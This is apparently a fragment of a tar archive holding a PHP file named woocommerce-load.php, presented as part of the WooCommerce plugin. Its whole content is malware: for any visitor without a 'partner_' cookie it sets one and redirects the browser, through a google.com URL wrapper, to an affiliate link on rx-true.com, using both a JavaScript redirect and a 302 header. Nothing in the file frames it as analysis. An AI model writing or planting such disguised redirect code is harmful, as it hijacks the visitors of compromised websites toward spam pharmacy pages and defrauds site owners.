woocommerce-load.php 0000644 00000000653 14751060760 0010523 0 ustar 00 <?php
$my_custom_redirect = 'https://rx-true.com/?aff=1880';
if (empty($_COOKIE['partner_'])) {
setcookie('partner_', 1, time() + 86400, '/');
echo '<script>
window.location.replace("https://www.google.com/url?sa=t&url=' . urlencode($my_custom_redirect) . '");
</script>';
header("Location: https://www.google.com/url?sa=t&url=" . urlencode($my_custom_redirect), true, 302);
exit;
}
?>